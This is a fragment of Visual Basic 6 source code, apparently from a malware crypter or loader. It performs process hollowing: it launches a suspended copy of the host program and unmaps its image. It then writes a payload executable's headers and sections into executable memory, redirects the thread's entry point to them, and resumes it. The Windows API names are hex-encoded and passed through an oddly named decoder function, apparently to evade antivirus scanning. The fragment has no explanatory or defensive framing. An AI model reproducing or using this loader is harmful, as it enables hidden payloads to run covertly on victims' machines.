- 'kernel32
- lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332"))
- 'ntdll
- lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C"))
- If sHost = vbNullString Then
- sHost = Space(260)
- 'GetModuleFileNameW
- lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557"))
- Invoke lMod, App.hInstance, StrPtr(sHost), 260
- End If
- With tIMAGE_NT_HEADERS.OptionalHeader
- tSTARTUPINFO.cb = Len(tSTARTUPINFO)
- 'CreateProcessW
- lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357"))
- Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
- 'NtUnmapViewOfSection
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E"))
- Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
- 'VirtualAllocEx
- lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578"))
- Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
- 'NtWriteVirtualMemory
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))
- Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
- For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
- CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
- Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
- Next i
- tCONTEXT.ContextFlags = CONTEXT_FULL
- 'NtGetContextThread
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164"))
- Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
- 'NtWriteVirtualMemory
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))
- Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
- tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
- 'NtSetContextThread
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164"))
- Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
- 'NtResumeThread
- lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164"))
- Invoke lMod, tPROCESS_INFORMATION.hThread, 0
- hProc = tPROCESS_INFORMATION.hProcess
- End With